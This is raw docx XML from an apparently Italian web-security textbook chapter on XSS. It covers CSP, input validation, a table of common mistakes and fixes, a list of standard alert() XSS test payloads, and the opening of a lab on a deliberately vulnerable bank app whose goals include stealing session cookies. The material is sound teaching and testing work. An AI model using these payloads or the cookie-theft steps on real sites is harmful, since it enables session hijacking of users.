        <w:t xml:space="preserve">"base-uri 'self';"</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p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Con questa CSP:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- Tutti gli script devono provenire dal proprio dominio (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">'self'</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- Niente</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;script&gt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">inline</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- Niente</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;object&gt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;embed&gt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- Niente reindirizzamento dell’attributo</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;base&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Risultato: anche se XSS riesce a iniettare uno</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;script&gt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">inline,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">il browser si rifiuta di eseguirlo</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. CSP è l’ultima linea di difesa contro XSS, e funziona.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">CSP è complessa da configurare (richiede di sapere esattamente da dove arrivano i propri script, immagini, font). Per il primo anno, ricordatene l’esistenza; tornerai a configurarla in modo serio in moduli avanzati.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="365"/>
    <w:bookmarkStart w:id="366" w:name="strato-3-input-validation-in-supporto"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Strato 3 — Input validation (in supporto)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">La validazione dell’input non è una difesa contro XSS (i payload XSS possono essere stringhe valide), ma riduce la superficie di attacco. Esempi:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1137"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Username: solo lettere, numeri, underscore (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">re.fullmatch(r"[a-zA-Z0-9_]{3,20}", username)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1137"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Numeri: convertire a</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">int</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">float</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1137"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Date: parsare con</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">datetime.strptime</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">In supporto all’escape, mai in sostituzione.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="366"/>
    <w:bookmarkEnd w:id="367"/>
    <w:bookmarkStart w:id="368" w:name="errori-comuni-in-produzione-2"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="548" w:name="sec_8_9"/>
      <w:r>
        <w:t xml:space="preserve">8.9 Errori comuni in produzione</w:t>
      </w:r>
      <w:bookmarkEnd w:id="548"/>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t xml:space="preserve">Concatenazione di input in HTML (senza template)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">XSS totale</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Usare template con escape automatico</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">| safe</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">su contenuto utente in Jinja2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Reflected/Stored XSS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Rimuovere</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">| safe</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">, sanitizzare con Bleach se serve formattazione</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">dangerouslySetInnerHTML</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">in React,</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">v-html</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">in Vue,</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">[innerHTML]</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">in Angular</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">XSS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Usare la binding standard</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">{value}</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">,</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">{{ value }}</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">,</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">{{ value }}</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">rispettivamente</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Cookie di sessione senza</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">HttpOnly</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Furto banale via XSS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">SESSION_COOKIE_HTTPONLY = True</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Cookie senza</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">Secure</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Cookie inviato anche su HTTP, intercettabile</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">SESSION_COOKIE_SECURE = True</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">(richiede HTTPS)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Nessuna CSP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">XSS sfrutta script inline senza limiti</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">Content-Security-Policy</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">minima</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">default-src 'self'</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Sanitizzare con regex personalizzata</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Bypass facili (vedi anche </w:t>
            </w:r>
            <w:hyperlink w:anchor="sec_5_9" w:history="1">
              <w:r>
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:color w:val="0563C1"/>
                  <w:u w:val="single"/>
                </w:rPr>
                <w:t xml:space="preserve">§5.9</w:t>
              </w:r>
            </w:hyperlink>
            <w:r>
              <w:t xml:space="preserve"> di SQLi)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Usare Bleach o equivalenti, non regex</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Filtrare</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">&lt;script&gt;</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">ma non</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">&lt;img onerror=...&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Bypass tramite event handler</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Bleach con whitelist di tag e attributi</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Inserire dati utente in URL JavaScript (</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">&lt;a href="javascript:..."&gt;</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">XSS via</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">javascript:</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">URL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Validare/whitelistare gli schemi delle URL</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BlockText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">💡</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Payload XSS comuni che vedrai durante un audit.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Queste stringhe sono la</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">cassetta degli attrezzi</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">di un tester:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1138"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;script&gt;alert(1)&lt;/script&gt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">— Il classico</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1138"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;img src=x onerror=alert(1)&gt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">— Aggira filtri di</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1138"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;svg onload=alert(1)&gt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">— Stessa logica con SVG</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1138"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;iframe src="javascript:alert(1)"&gt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">— Schema URL pericoloso</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1138"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">"&gt;&lt;script&gt;alert(1)&lt;/script&gt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">— Per uscire da un attributo HTML</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1138"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">';alert(1);//</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">— Per attributi onClick e simili</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1138"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;a href="javascript:alert(1)"&gt;click&lt;/a&gt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">— XSS via link cliccabile</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="368"/>
    <w:bookmarkStart w:id="372" w:name="X174451529bf0d8cb9d04758a254b23c0eedbc26"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="549" w:name="sec_8_10"/>
      <w:r>
        <w:t xml:space="preserve">8.10 Laboratorio finale: XSS su BancaPiccola completa</w:t>
      </w:r>
      <w:bookmarkEnd w:id="549"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BlockText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">ℹ️ Riferimento al repo</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">BancaPiccola</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(rilasciato dal docente). Se non disponibile, ripeti gli esercizi su</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">bancapiccola-mini</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">esteso.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="369" w:name="obiettivi-1"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Obiettivi</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Su</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">BancaPiccola-vuln</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1139"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Reflected XSS</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">— Trova un endpoint che riflette l’input dell’utente nell’HTML senza escape. Costruisci un URL che apre un alert.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1139"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Stored XSS</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">— Trova un campo che viene salvato sul server e mostrato ad altri utenti. Inietta un payload che ruba il cookie di sessione di chi visita la pagina.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1139"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Furto sessione completo</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">— Avvia un server</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">attaccante</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">come nel </w:t>
      </w:r>
      <w:hyperlink w:anchor="sec_8_5" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:color w:val="0563C1"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t xml:space="preserve">§8.5</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
